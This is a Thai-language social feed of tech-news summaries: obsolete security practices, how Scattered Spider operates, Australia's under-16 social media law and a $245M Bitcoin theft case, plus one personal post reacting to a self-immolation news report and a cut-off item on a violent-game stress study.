    เช่น การใช้ OAuth token หรือการโจมตีผ่าน IoT

    5️⃣ การใช้ SMS เป็นวิธี 2FA
    เสี่ยงต่อการถูกโจมตีผ่าน SIM swapping และช่องโหว่ของเครือข่ายโทรศัพท์
    ไม่ปลอดภัยสำหรับการป้องกันบัญชีสำคัญ

    6️⃣ การใช้ SIEM แบบ on-premises
    เสียค่าใช้จ่ายสูงและไม่สามารถตรวจจับภัยในระบบ cloud ได้อย่างมีประสิทธิภาพ
    เสี่ยงต่อการพลาดข้อมูลสำคัญจากระบบ cloud

    7️⃣ การปล่อยให้ผู้ใช้เป็นผู้รับแบบ passive ในวัฒนธรรมความปลอดภัย
    ต้องสร้างการมีส่วนร่วมและการเรียนรู้อย่างต่อเนื่องเพื่อป้องกัน phishing และ social engineering
    การขาดการฝึกอบรมทำให้ phishing และ social engineering สำเร็จง่ายขึ้น

    https://www.csoonline.com/article/4022848/7-obsolete-security-practices-that-should-be-terminated-immediately.html
    🎙️ เรื่องเล่าจากโลกไซเบอร์: 7 แนวทางความปลอดภัยที่ควรเลิกใช้ ก่อนที่มันจะทำร้ายองค์กร ในยุคที่ภัยไซเบอร์ซับซ้อนและเปลี่ยนแปลงเร็ว การยึดติดกับแนวทางเก่า ๆ อาจกลายเป็นจุดอ่อนร้ายแรงขององค์กร บทความจาก CSO Online ได้รวบรวม 7 แนวทางด้านความปลอดภัยที่ล้าสมัยและควรเลิกใช้ทันที พร้อมคำแนะนำจากผู้เชี่ยวชาญในวงการ 1️⃣ การพึ่ง perimeter-only security ➡️ ไม่เพียงพอในยุค cloud และ hybrid work ต้องใช้แนวคิด Zero Trust 2️⃣ การเน้น compliance มากกว่าความปลอดภัยจริง ➡️ การตรวจสอบตามข้อกำหนดไม่ช่วยป้องกันภัยคุกคามที่แท้จริง ⛔ ทีมงานอาจมัวแต่ตอบ audit แทนที่จะป้องกันภัยจริง 3️⃣ การใช้ VPN แบบเก่า (legacy VPNs) ➡️ ไม่สามารถรองรับการทำงานแบบ remote และขาดการอัปเดตที่ปลอดภัย ⛔ เสี่ยงต่อการโจมตีและการเข้าถึงโดยไม่ได้รับอนุญาต 4️⃣ การคิดว่า EDR เพียงพอแล้ว ➡️ ผู้โจมตีสามารถหลบเลี่ยง EDR โดยโจมตีผ่าน cloud, network หรือ API ⛔ เช่น การใช้ OAuth token หรือการโจมตีผ่าน IoT 5️⃣ การใช้ SMS เป็นวิธี 2FA ➡️ เสี่ยงต่อการถูกโจมตีผ่าน SIM swapping และช่องโหว่ของเครือข่ายโทรศัพท์ ⛔ ไม่ปลอดภัยสำหรับการป้องกันบัญชีสำคัญ 6️⃣ การใช้ SIEM แบบ on-premises ➡️ เสียค่าใช้จ่ายสูงและไม่สามารถตรวจจับภัยในระบบ cloud ได้อย่างมีประสิทธิภาพ ⛔ เสี่ยงต่อการพลาดข้อมูลสำคัญจากระบบ cloud 7️⃣ การปล่อยให้ผู้ใช้เป็นผู้รับแบบ passive ในวัฒนธรรมความปลอดภัย ➡️ ต้องสร้างการมีส่วนร่วมและการเรียนรู้อย่างต่อเนื่องเพื่อป้องกัน phishing และ social engineering ⛔ การขาดการฝึกอบรมทำให้ phishing และ social engineering สำเร็จง่ายขึ้น https://www.csoonline.com/article/4022848/7-obsolete-security-practices-that-should-be-terminated-immediately.html
    WWW.CSOONLINE.COM
    7 obsolete security practices that should be terminated immediately
    Bad habits can be hard to break. Yet when it comes to security, an outdated practice is not only useless, but potentially dangerous.
    0 ความคิดเห็น 0 การแบ่งปัน 299 มุมมอง 0 รีวิว
  • Scattered Spider เป็นกลุ่มแฮกเกอร์ที่เริ่มปรากฏตัวตั้งแต่ปี 2022 โดยใช้วิธี SIM-swapping และ ransomware โจมตีบริษัทโทรคมนาคมและบันเทิง เช่น MGM Resorts และ Caesars Entertainment แต่ในปี 2025 พวกเขาขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีก (Marks & Spencer, Harrods) และสายการบิน (Hawaiian, Qantas) สร้างความเสียหายหลายล้านดอลลาร์

    เทคนิคที่ใช้ล่าสุดคือการหลอกพนักงาน help desk ด้วยข้อมูลส่วนตัวของผู้บริหาร เช่น วันเกิดและเลขประกันสังคม เพื่อรีเซ็ตอุปกรณ์และเข้าถึงบัญชีระดับสูง จากนั้นใช้สิทธิ์นั้นเจาะระบบ Entra ID (Azure AD), SharePoint, Horizon VDI และ VPN เพื่อควบคุมระบบทั้งหมด

    เมื่อถูกตรวจจับ กลุ่มนี้ไม่หนี แต่กลับโจมตีระบบอย่างเปิดเผย เช่น ลบกฎไฟร์วอลล์ของ Azure และปิด domain controller เพื่อขัดขวางการกู้คืนระบบ

    นักวิจัยจาก Rapid7 และ ReliaQuest พบว่า Scattered Spider:
    - ใช้เครื่องมือเช่น ngrok และ Teleport เพื่อสร้างช่องทางลับ
    - ใช้ IAM role enumeration และ EC2 Serial Console เพื่อเจาะระบบ AWS
    - ใช้บัญชีผู้ดูแลระบบที่ถูกแฮกเพื่อดึงข้อมูลจาก CyberArk password vault กว่า 1,400 รายการ

    แม้ Microsoft จะเข้ามาช่วยกู้คืนระบบได้ในที่สุด แต่เหตุการณ์นี้แสดงให้เห็นถึงความสามารถของกลุ่มแฮกเกอร์ที่ผสมผสาน “การหลอกมนุษย์” กับ “การเจาะระบบเทคนิค” ได้อย่างมีประสิทธิภาพ

    ข้อมูลจากข่าว
    - Scattered Spider เริ่มโจมตีตั้งแต่ปี 2022 โดยใช้ SIM-swapping และ ransomware
    - ขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีกและสายการบินในปี 2025
    - ใช้ข้อมูลส่วนตัวของผู้บริหารเพื่อหลอก help desk และเข้าถึงบัญชีระดับสูง
    - เจาะระบบ Entra ID, SharePoint, Horizon VDI, VPN และ CyberArk
    - ใช้เครื่องมือเช่น ngrok, Teleport, EC2 Serial Console และ IAM role enumeration
    - ลบกฎไฟร์วอลล์ Azure และปิด domain controller เพื่อขัดขวางการกู้คืน
    - Microsoft ต้องเข้ามาช่วยกู้คืนระบบ
    - Rapid7 และ ReliaQuest แนะนำให้ใช้ MFA แบบต้าน phishing และจำกัดสิทธิ์ผู้ใช้งาน

    คำเตือนและข้อควรระวัง
    - การหลอก help desk ด้วยข้อมูลส่วนตัวยังคงเป็นช่องโหว่ใหญ่ขององค์กร
    - บัญชีผู้บริหารมักมีสิทธิ์มากเกินไป ทำให้แฮกเกอร์เข้าถึงระบบได้ง่าย
    - การใช้เครื่องมือ legitimate เช่น Teleport อาจหลบการตรวจจับได้
    - หากไม่มีการตรวจสอบสิทธิ์และพฤติกรรมผู้ใช้อย่างสม่ำเสมอ องค์กรอาจไม่รู้ตัวว่าถูกแฮก
    - การพึ่งพา endpoint detection เพียงอย่างเดียวไม่สามารถป้องกันการเจาะระบบแบบนี้ได้
    - องค์กรควรฝึกอบรมพนักงานเรื่อง social engineering และมีระบบตรวจสอบการรีเซ็ตบัญชีที่เข้มงวด

    https://www.csoonline.com/article/4020567/anatomy-of-a-scattered-spider-attack-a-growing-ransomware-threat-evolves.html
    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่เริ่มปรากฏตัวตั้งแต่ปี 2022 โดยใช้วิธี SIM-swapping และ ransomware โจมตีบริษัทโทรคมนาคมและบันเทิง เช่น MGM Resorts และ Caesars Entertainment แต่ในปี 2025 พวกเขาขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีก (Marks & Spencer, Harrods) และสายการบิน (Hawaiian, Qantas) สร้างความเสียหายหลายล้านดอลลาร์ เทคนิคที่ใช้ล่าสุดคือการหลอกพนักงาน help desk ด้วยข้อมูลส่วนตัวของผู้บริหาร เช่น วันเกิดและเลขประกันสังคม เพื่อรีเซ็ตอุปกรณ์และเข้าถึงบัญชีระดับสูง จากนั้นใช้สิทธิ์นั้นเจาะระบบ Entra ID (Azure AD), SharePoint, Horizon VDI และ VPN เพื่อควบคุมระบบทั้งหมด เมื่อถูกตรวจจับ กลุ่มนี้ไม่หนี แต่กลับโจมตีระบบอย่างเปิดเผย เช่น ลบกฎไฟร์วอลล์ของ Azure และปิด domain controller เพื่อขัดขวางการกู้คืนระบบ นักวิจัยจาก Rapid7 และ ReliaQuest พบว่า Scattered Spider: - ใช้เครื่องมือเช่น ngrok และ Teleport เพื่อสร้างช่องทางลับ - ใช้ IAM role enumeration และ EC2 Serial Console เพื่อเจาะระบบ AWS - ใช้บัญชีผู้ดูแลระบบที่ถูกแฮกเพื่อดึงข้อมูลจาก CyberArk password vault กว่า 1,400 รายการ แม้ Microsoft จะเข้ามาช่วยกู้คืนระบบได้ในที่สุด แต่เหตุการณ์นี้แสดงให้เห็นถึงความสามารถของกลุ่มแฮกเกอร์ที่ผสมผสาน “การหลอกมนุษย์” กับ “การเจาะระบบเทคนิค” ได้อย่างมีประสิทธิภาพ ✅ ข้อมูลจากข่าว - Scattered Spider เริ่มโจมตีตั้งแต่ปี 2022 โดยใช้ SIM-swapping และ ransomware - ขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีกและสายการบินในปี 2025 - ใช้ข้อมูลส่วนตัวของผู้บริหารเพื่อหลอก help desk และเข้าถึงบัญชีระดับสูง - เจาะระบบ Entra ID, SharePoint, Horizon VDI, VPN และ CyberArk - ใช้เครื่องมือเช่น ngrok, Teleport, EC2 Serial Console และ IAM role enumeration - ลบกฎไฟร์วอลล์ Azure และปิด domain controller เพื่อขัดขวางการกู้คืน - Microsoft ต้องเข้ามาช่วยกู้คืนระบบ - Rapid7 และ ReliaQuest แนะนำให้ใช้ MFA แบบต้าน phishing และจำกัดสิทธิ์ผู้ใช้งาน ‼️ คำเตือนและข้อควรระวัง - การหลอก help desk ด้วยข้อมูลส่วนตัวยังคงเป็นช่องโหว่ใหญ่ขององค์กร - บัญชีผู้บริหารมักมีสิทธิ์มากเกินไป ทำให้แฮกเกอร์เข้าถึงระบบได้ง่าย - การใช้เครื่องมือ legitimate เช่น Teleport อาจหลบการตรวจจับได้ - หากไม่มีการตรวจสอบสิทธิ์และพฤติกรรมผู้ใช้อย่างสม่ำเสมอ องค์กรอาจไม่รู้ตัวว่าถูกแฮก - การพึ่งพา endpoint detection เพียงอย่างเดียวไม่สามารถป้องกันการเจาะระบบแบบนี้ได้ - องค์กรควรฝึกอบรมพนักงานเรื่อง social engineering และมีระบบตรวจสอบการรีเซ็ตบัญชีที่เข้มงวด https://www.csoonline.com/article/4020567/anatomy-of-a-scattered-spider-attack-a-growing-ransomware-threat-evolves.html
    WWW.CSOONLINE.COM
    Anatomy of a Scattered Spider attack: A growing ransomware threat evolves
    The cybercriminal group has broadened its attack scope across several new industries, bringing valid credentials to bear on help desks before leveraging its new learnings of cloud intrusion tradecraft to set the stage for ransomware.
    0 ความคิดเห็น 0 การแบ่งปัน 335 มุมมอง 0 รีวิว
  • หนุ่มเครียด! ใช้น้ำมันราดตัวเองแล้วจุดไฟเผาตัวเอง ดับสลดต่อหน้าแม่ คาดเครียดเรื่องที่ป่วยขาเป็นแผลมานานจนทำงานไม่ถนัด ผมอ่านรายละเอียดของข่าวในลิงค์แล้ว ขาเป็นแผล หมอไม่ค่อยรับรักษา ยาที่รักษาก็ไม่ได้ผล ผมนึกถึงตระกูล ส. และ หมอผีหมอมู สปสช. แล้วรู้สึกเจ็บใจว่ะ ถึงว่าทำไมใต้ข้อพับขาขวาคันติดเชื้อราไม่หายไม่พอแถมไปติดข้อพับขาซ้ายอีก เป็นนายตัวเองแต่สำหรับผมขาเป็นแผลไม่ใช่ปัญหา แต่ความคาดหวังและแรงกดดันจากคนรอบข้างผมพยายามจะไม่ให้ความสนใจ แต่มาให้ความสนใจจนผมดิ่ง นอยด์ จนผมรู้สึกว่าผมขอลาขาดจากวงคุยการเมืองไปทุกทีๆแล้ว เพราะโหนกระแส บางทีมีนักการเมืองพรรคสีแดง พรรคสีส้ม คอยให้ท้าย โหนกระแสไม่เคยขยี้นักการเมืองส้นตีนพวกนั้นเลย ผมแทบจะยั้งอารมณ์โทสะที่จะนำไปสู่การ ทำร้...ตัวเอง จนนำไปสู่เหตุปัจจัยร้ายแรงต่อไปได้ รู้จักระงับ รู้จักปล่อยวาง แต่ก็จะพยายามละทิ้งไม่ให้จมอยู่กับความคิดและความทรงจำเดิมๆที่มีแต่ความย่ำแย่และพาถอยหลังลงหลุมดำ
    อาชีพช่างออกแบบเฟอร์นิเจอร์หรือวิศวกรเฟอร์นิเจอร์ บางทีถ้าทำงานให้ไอ้เจ้านายปากท็อกซิกผมว่าไม่มีวันรุ่งเรืองในอนาคตหรอก แต่ออกมาเป็นนายตัวเองรุ่งเรืองกว่าเก่านะ แถมได้ฮีลใจไปด้วย มีเวลาว่างเที่ยวกินเท่าไหร่ก็ได้ตามใจฉัน แต่ขอใช้จ่ายอย่างระมัดระวัง
    วันนี้นอยด์สุดๆเลย นึกว่าทำงานเสร็จหมดแล้ว ที่ไหนได้ จัดฉากให้ผมมารู้ทีหลังว่างานยังไม่เสร็จ บางทีอยากเป็นไอ้เด็กเร่ร่อนโง่ๆดีกว่าเป็นวัวเป็นควายเป็นลูกจ้างเป็นทาสชั้นต่ำให้คนอย่างพวกเขา
    ลิงค์ที่มาของข่าว อัมรินทร์ ทีวี (ไม่ใช่ของอ่ำ อัมรินทร์)
    https://www.amarintv.com/news/social/219340
    หนุ่มเครียด! ใช้น้ำมันราดตัวเองแล้วจุดไฟเผาตัวเอง ดับสลดต่อหน้าแม่ คาดเครียดเรื่องที่ป่วยขาเป็นแผลมานานจนทำงานไม่ถนัด ผมอ่านรายละเอียดของข่าวในลิงค์แล้ว ขาเป็นแผล หมอไม่ค่อยรับรักษา ยาที่รักษาก็ไม่ได้ผล ผมนึกถึงตระกูล ส. และ หมอผีหมอมู สปสช. แล้วรู้สึกเจ็บใจว่ะ ถึงว่าทำไมใต้ข้อพับขาขวาคันติดเชื้อราไม่หายไม่พอแถมไปติดข้อพับขาซ้ายอีก เป็นนายตัวเองแต่สำหรับผมขาเป็นแผลไม่ใช่ปัญหา แต่ความคาดหวังและแรงกดดันจากคนรอบข้างผมพยายามจะไม่ให้ความสนใจ แต่มาให้ความสนใจจนผมดิ่ง นอยด์ จนผมรู้สึกว่าผมขอลาขาดจากวงคุยการเมืองไปทุกทีๆแล้ว เพราะโหนกระแส บางทีมีนักการเมืองพรรคสีแดง พรรคสีส้ม คอยให้ท้าย โหนกระแสไม่เคยขยี้นักการเมืองส้นตีนพวกนั้นเลย ผมแทบจะยั้งอารมณ์โทสะที่จะนำไปสู่การ ทำร้...ตัวเอง จนนำไปสู่เหตุปัจจัยร้ายแรงต่อไปได้ รู้จักระงับ รู้จักปล่อยวาง แต่ก็จะพยายามละทิ้งไม่ให้จมอยู่กับความคิดและความทรงจำเดิมๆที่มีแต่ความย่ำแย่และพาถอยหลังลงหลุมดำ อาชีพช่างออกแบบเฟอร์นิเจอร์หรือวิศวกรเฟอร์นิเจอร์ บางทีถ้าทำงานให้ไอ้เจ้านายปากท็อกซิกผมว่าไม่มีวันรุ่งเรืองในอนาคตหรอก แต่ออกมาเป็นนายตัวเองรุ่งเรืองกว่าเก่านะ แถมได้ฮีลใจไปด้วย มีเวลาว่างเที่ยวกินเท่าไหร่ก็ได้ตามใจฉัน แต่ขอใช้จ่ายอย่างระมัดระวัง วันนี้นอยด์สุดๆเลย นึกว่าทำงานเสร็จหมดแล้ว ที่ไหนได้ จัดฉากให้ผมมารู้ทีหลังว่างานยังไม่เสร็จ บางทีอยากเป็นไอ้เด็กเร่ร่อนโง่ๆดีกว่าเป็นวัวเป็นควายเป็นลูกจ้างเป็นทาสชั้นต่ำให้คนอย่างพวกเขา ลิงค์ที่มาของข่าว อัมรินทร์ ทีวี (ไม่ใช่ของอ่ำ อัมรินทร์) https://www.amarintv.com/news/social/219340
    0 ความคิดเห็น 0 การแบ่งปัน 217 มุมมอง 0 รีวิว
  • รัฐบาลออสเตรเลียตั้งเป้าจะ “ถอดบัญชีโซเชียลมีเดียของเยาวชนอายุ 10–15 ปีมากกว่า 1 ล้านบัญชี” → โดยตั้งกฎหมายใหม่ให้ “ผู้ใช้ต้องมีอายุอย่างน้อย 16 ปี” จึงจะใช้งานโซเชียลมีเดียได้ → ถ้าฝ่าฝืน บริษัทแพลตฟอร์มจะถูกปรับถึง A$30 ล้าน (≒ 820 ล้านบาท!)

    แต่ปัญหาคือ…กฎหมายผ่านแล้ว แต่ขั้นตอนปฏิบัติยังไม่ชัดเจน → จะนิยามว่า “โซเชียลมีเดีย” ว่าอะไรบ้าง? เช่น YouTube จะนับรวมไหม? → จะยืนยันอายุผู้ใช้แบบไหน? ใช้ AI, เอกสาร หรือการตรวจสอบโดยมนุษย์? → หากใช้ VPN เปลี่ยนที่อยู่ จะรับมือยังไง?

    หลายแพลตฟอร์มอย่าง YouTube ออกมาคัดค้าน → เพราะมองว่า “ตัวเองไม่ใช่โซเชียล แต่เป็นแพลตฟอร์มวิดีโอเพื่อการเรียนรู้” → กว่า 80% ของครูออสเตรเลียใช้ YouTube ในห้องเรียน → แต่หน่วยงานความปลอดภัยยืนยันว่าต้องรวม YouTube เพราะเด็กใช้มากที่สุดและมีฟีเจอร์ like, share, comment

    ตอนนี้ยังอยู่ในช่วงหารือกับบริษัทเทคโนโลยี → ต้องตกลงให้ได้ว่าบริษัทต้องทำอะไรเพื่อแสดงว่า “กำลังพยายามป้องกันไม่ให้เด็กต่ำกว่า 16 มีบัญชี” → รวมถึงต้องมีช่องให้ครู–ผู้ปกครองแจ้งบัญชีต้องสงสัย และมีวิธีป้องกันการหลบหลีกผ่าน VPN ด้วย

    ออสเตรเลียเตรียมใช้กฎหมายใหม่ที่ “ห้ามเด็กอายุต่ำกว่า 16 ใช้โซเชียลมีเดีย” เริ่ม ธ.ค. 2025  
    • มีบทลงโทษแพลตฟอร์มละเมิดสูงถึง A$30 ล้าน  
    • คาดว่าจะกระทบบัญชีเยาวชนมากกว่า 1 ล้านราย

    แพลตฟอร์มที่ได้รับผลกระทบอาจรวมถึง YouTube, Instagram, TikTok, X, Facebook ฯลฯ  
    • YouTube เคยคาดว่าจะถูกยกเว้น แต่ถูกบอกว่าต้องรวม เพราะเด็กใช้มากและมีฟีเจอร์ “เสพติด”

    ยังไม่มีแนวทางชัดเจนว่าจะ “ยืนยันอายุผู้ใช้” อย่างไร  
    • ทดลองระบบยืนยันอายุแล้ว แต่ยังไม่ประกาศผลอย่างเป็นทางการ  
    • อยู่ระหว่างหารือกับบริษัทเทคโนโลยีเรื่องแนวทางปฏิบัติ

    ประเทศอื่นๆ เริ่มเดินตามแนวคิดนี้ เช่น นิวซีแลนด์ และฝรั่งเศส  
    • ฝรั่งเศสเตรียมห้ามเด็กต่ำกว่า 15 ใช้โซเชียลเช่นกัน

    https://www.thestar.com.my/tech/tech-news/2025/07/07/australia-wants-to-bar-children-from-social-media-can-it-succeed
    รัฐบาลออสเตรเลียตั้งเป้าจะ “ถอดบัญชีโซเชียลมีเดียของเยาวชนอายุ 10–15 ปีมากกว่า 1 ล้านบัญชี” → โดยตั้งกฎหมายใหม่ให้ “ผู้ใช้ต้องมีอายุอย่างน้อย 16 ปี” จึงจะใช้งานโซเชียลมีเดียได้ → ถ้าฝ่าฝืน บริษัทแพลตฟอร์มจะถูกปรับถึง A$30 ล้าน (≒ 820 ล้านบาท!) แต่ปัญหาคือ…กฎหมายผ่านแล้ว แต่ขั้นตอนปฏิบัติยังไม่ชัดเจน → จะนิยามว่า “โซเชียลมีเดีย” ว่าอะไรบ้าง? เช่น YouTube จะนับรวมไหม? → จะยืนยันอายุผู้ใช้แบบไหน? ใช้ AI, เอกสาร หรือการตรวจสอบโดยมนุษย์? → หากใช้ VPN เปลี่ยนที่อยู่ จะรับมือยังไง? หลายแพลตฟอร์มอย่าง YouTube ออกมาคัดค้าน → เพราะมองว่า “ตัวเองไม่ใช่โซเชียล แต่เป็นแพลตฟอร์มวิดีโอเพื่อการเรียนรู้” → กว่า 80% ของครูออสเตรเลียใช้ YouTube ในห้องเรียน → แต่หน่วยงานความปลอดภัยยืนยันว่าต้องรวม YouTube เพราะเด็กใช้มากที่สุดและมีฟีเจอร์ like, share, comment ตอนนี้ยังอยู่ในช่วงหารือกับบริษัทเทคโนโลยี → ต้องตกลงให้ได้ว่าบริษัทต้องทำอะไรเพื่อแสดงว่า “กำลังพยายามป้องกันไม่ให้เด็กต่ำกว่า 16 มีบัญชี” → รวมถึงต้องมีช่องให้ครู–ผู้ปกครองแจ้งบัญชีต้องสงสัย และมีวิธีป้องกันการหลบหลีกผ่าน VPN ด้วย ✅ ออสเตรเลียเตรียมใช้กฎหมายใหม่ที่ “ห้ามเด็กอายุต่ำกว่า 16 ใช้โซเชียลมีเดีย” เริ่ม ธ.ค. 2025   • มีบทลงโทษแพลตฟอร์มละเมิดสูงถึง A$30 ล้าน   • คาดว่าจะกระทบบัญชีเยาวชนมากกว่า 1 ล้านราย ✅ แพลตฟอร์มที่ได้รับผลกระทบอาจรวมถึง YouTube, Instagram, TikTok, X, Facebook ฯลฯ   • YouTube เคยคาดว่าจะถูกยกเว้น แต่ถูกบอกว่าต้องรวม เพราะเด็กใช้มากและมีฟีเจอร์ “เสพติด” ✅ ยังไม่มีแนวทางชัดเจนว่าจะ “ยืนยันอายุผู้ใช้” อย่างไร   • ทดลองระบบยืนยันอายุแล้ว แต่ยังไม่ประกาศผลอย่างเป็นทางการ   • อยู่ระหว่างหารือกับบริษัทเทคโนโลยีเรื่องแนวทางปฏิบัติ ✅ ประเทศอื่นๆ เริ่มเดินตามแนวคิดนี้ เช่น นิวซีแลนด์ และฝรั่งเศส   • ฝรั่งเศสเตรียมห้ามเด็กต่ำกว่า 15 ใช้โซเชียลเช่นกัน https://www.thestar.com.my/tech/tech-news/2025/07/07/australia-wants-to-bar-children-from-social-media-can-it-succeed
    WWW.THESTAR.COM.MY
    Australia wants to bar children from social media. Can it succeed?
    A law that restricts social media use to people 16 and over goes into effect in December, but much about it remains unclear or undecided.
    0 ความคิดเห็น 0 การแบ่งปัน 279 มุมมอง 0 รีวิว
  • เรื่องราวเริ่มจาก Chetal และพวก 2 คน ใช้เทคนิค social engineering ปลอมตัวเป็นเจ้าหน้าที่ Google/Yahoo หลอกเหยื่อจากวอชิงตัน ดี.ซี. จนสามารถขโมย Bitcoin จำนวน 4,100 เหรียญ มูลค่าราว $245 ล้าน (และตอนนี้ขึ้นมาเกือบ $440 ล้านแล้ว!)

    จากนั้นเขาใช้เงินที่ได้ไปใช้ชีวิตหรูหราทั้งซื้อรถ, เช่าคฤหาสน์, ปาร์ตี้ไนต์คลับ และเครื่องเพชร — จนกลายเป็นเป้าสายตาแบบเต็ม ๆ

    และเรื่องดันบานปลาย เมื่อ พ่อแม่ของ Chetal ถูกกลุ่มอาชญากรจากฟลอริดารุมทำร้าย-ลักพาตัว แบบกลางวันแสก ๆ ด้วยการเอารถชน, มัดมือ, ยัดใส่รถตู้ — แต่โชคดีที่มีเจ้าหน้าที่ FBI นอกเครื่องแบบอยู่ใกล้ ๆ และช่วยได้ทัน

    ต่อมา FBI บุกค้นบ้าน พบเงินสด $500,000 และคริปโตอีก $39 ล้าน ซ้ำยังพบว่า Chetal เคยก่อเหตุแบบเดียวกันอีกเกือบ 50 ครั้ง รวมรายได้อีก $3 ล้าน

    ตอนนี้ Chetal ยอมรับผิดและให้ความร่วมมือกับทางการ เพื่อแลกกับโทษที่เบาลง — แต่อาจต้องติดคุก 19–24 ปี, ถูกปรับสูงสุด $500,000 และอาจ ถูกเนรเทศกลับอินเดีย เพราะเป็นผู้ย้ายถิ่นตั้งแต่ยังเด็ก

    ข้อมูลจากข่าว:
    Veer Chetal และพรรคพวกขโมย Bitcoin จำนวน 4,100 BTC มูลค่า $245 ล้าน ในเดือนส.ค. 2024  
    • ใช้การหลอกลวงแบบ social engineering ด้วยการปลอมเป็นเจ้าหน้าที่บริการเว็บชื่อดัง

    หลังการขโมย Chetal ใช้ชีวิตฟุ่มเฟือย  
    • ซื้อรถหรู, เครื่องเพชร, เช่าคฤหาสน์ และปาร์ตี้อย่างรื่นเริง

    พ่อแม่ของเขาถูกกลุ่มชายจากฟลอริดาลักพาตัวกลางวันแสก ๆ ด้วยความรุนแรง  
    • โชคดีที่มี FBI อยู่ในเหตุการณ์ ทำให้ช่วยไว้ได้ทัน

    FBI ค้นบ้านพบ $500,000 เงินสด และ crypto อีก $39 ล้าน  
    • ตรวจพบว่ามีคดีคล้ายกันอีก 50 ครั้ง รวมเงิน $3 ล้าน

    Chetal ยอมรับผิดข้อหาฉ้อโกงและฟอกเงิน  
    • เตรียมรับโทษจำคุก 19–24 ปี และปรับ $50,000–$500,000 พร้อมชดใช้เหยื่อ  
    • อาจถูกเนรเทศกลับอินเดีย เพราะไม่ใช่พลเมืองสหรัฐฯ

    พ่อของเขาถูกไล่ออกจาก Morgan Stanley จากเหตุผลเกี่ยวกับคดีนี้

    https://www.tomshardware.com/tech-industry/cryptocurrency/man-behind-usd245m-bitcoin-theft-has-bizarre-tale-that-includes-kidnapped-parents-fraud-and-money-laundering-suspect-now-faces-up-to-24-years-in-prison-half-million-dollar-fine-and-possible-deportation-to-india
    เรื่องราวเริ่มจาก Chetal และพวก 2 คน ใช้เทคนิค social engineering ปลอมตัวเป็นเจ้าหน้าที่ Google/Yahoo หลอกเหยื่อจากวอชิงตัน ดี.ซี. จนสามารถขโมย Bitcoin จำนวน 4,100 เหรียญ มูลค่าราว $245 ล้าน (และตอนนี้ขึ้นมาเกือบ $440 ล้านแล้ว!) จากนั้นเขาใช้เงินที่ได้ไปใช้ชีวิตหรูหราทั้งซื้อรถ, เช่าคฤหาสน์, ปาร์ตี้ไนต์คลับ และเครื่องเพชร — จนกลายเป็นเป้าสายตาแบบเต็ม ๆ และเรื่องดันบานปลาย เมื่อ พ่อแม่ของ Chetal ถูกกลุ่มอาชญากรจากฟลอริดารุมทำร้าย-ลักพาตัว แบบกลางวันแสก ๆ ด้วยการเอารถชน, มัดมือ, ยัดใส่รถตู้ — แต่โชคดีที่มีเจ้าหน้าที่ FBI นอกเครื่องแบบอยู่ใกล้ ๆ และช่วยได้ทัน ต่อมา FBI บุกค้นบ้าน พบเงินสด $500,000 และคริปโตอีก $39 ล้าน ซ้ำยังพบว่า Chetal เคยก่อเหตุแบบเดียวกันอีกเกือบ 50 ครั้ง รวมรายได้อีก $3 ล้าน ตอนนี้ Chetal ยอมรับผิดและให้ความร่วมมือกับทางการ เพื่อแลกกับโทษที่เบาลง — แต่อาจต้องติดคุก 19–24 ปี, ถูกปรับสูงสุด $500,000 และอาจ ถูกเนรเทศกลับอินเดีย เพราะเป็นผู้ย้ายถิ่นตั้งแต่ยังเด็ก ✅ ข้อมูลจากข่าว: ✅ Veer Chetal และพรรคพวกขโมย Bitcoin จำนวน 4,100 BTC มูลค่า $245 ล้าน ในเดือนส.ค. 2024   • ใช้การหลอกลวงแบบ social engineering ด้วยการปลอมเป็นเจ้าหน้าที่บริการเว็บชื่อดัง ✅ หลังการขโมย Chetal ใช้ชีวิตฟุ่มเฟือย   • ซื้อรถหรู, เครื่องเพชร, เช่าคฤหาสน์ และปาร์ตี้อย่างรื่นเริง ✅ พ่อแม่ของเขาถูกกลุ่มชายจากฟลอริดาลักพาตัวกลางวันแสก ๆ ด้วยความรุนแรง   • โชคดีที่มี FBI อยู่ในเหตุการณ์ ทำให้ช่วยไว้ได้ทัน ✅ FBI ค้นบ้านพบ $500,000 เงินสด และ crypto อีก $39 ล้าน   • ตรวจพบว่ามีคดีคล้ายกันอีก 50 ครั้ง รวมเงิน $3 ล้าน ✅ Chetal ยอมรับผิดข้อหาฉ้อโกงและฟอกเงิน   • เตรียมรับโทษจำคุก 19–24 ปี และปรับ $50,000–$500,000 พร้อมชดใช้เหยื่อ   • อาจถูกเนรเทศกลับอินเดีย เพราะไม่ใช่พลเมืองสหรัฐฯ ✅ พ่อของเขาถูกไล่ออกจาก Morgan Stanley จากเหตุผลเกี่ยวกับคดีนี้ https://www.tomshardware.com/tech-industry/cryptocurrency/man-behind-usd245m-bitcoin-theft-has-bizarre-tale-that-includes-kidnapped-parents-fraud-and-money-laundering-suspect-now-faces-up-to-24-years-in-prison-half-million-dollar-fine-and-possible-deportation-to-india
    WWW.TOMSHARDWARE.COM
    Man behind $245m Bitcoin theft has bizarre tale that includes kidnapped parents, fraud, and money laundering — suspect now faces up to 24 years in prison, half-million-dollar fine, and possible deportation to India
    Connecticut man’s parents were kidnapped shortly after the BTC theft. The father allegedly lost his job at Morgan Stanley due to his son’s nefarious activities.
    0 ความคิดเห็น 0 การแบ่งปัน 485 มุมมอง 0 รีวิว
  • นักวิจัยจากเยอรมนีเลือกเกม A Plague Tale: Requiem ซึ่งเป็นเกมแอ็กชันดราม่าที่มีฉากรุนแรงชัดเจน พวกเขาแบ่งกลุ่มทดลองออกเป็นสองกลุ่ม:
    - กลุ่มแรกเล่น “ฉากรุนแรง” เช่น การต่อสู้หรือฆ่าศัตรู
    - กลุ่มที่สองเล่น “ฉากไม่รุนแรง” เช่น สำรวจหรือเล่าเนื้อเรื่อง

    ก่อนเล่น ทีมวิจัยทำให้ผู้ร่วมทดลอง “เครียด” โดยให้จุ่มมือในน้ำเย็นจัด 3 นาทีและโดนสอบสวนในเวลาเดียวกัน (เรียกว่า SECPT) เพื่อให้เกิดความเครียดทั้งทางกายและใจ จากนั้นให้เล่นเกม 25 นาที และวัดผลทั้งจากคลื่นหัวใจ, น้ำลาย และแบบสอบถาม

    ผลลัพธ์น่าสนใจคือ:
    - คนที่เล่นฉากรุนแรง “รู้สึกเครียดกว่า” ตอนตอบแบบสอบถาม
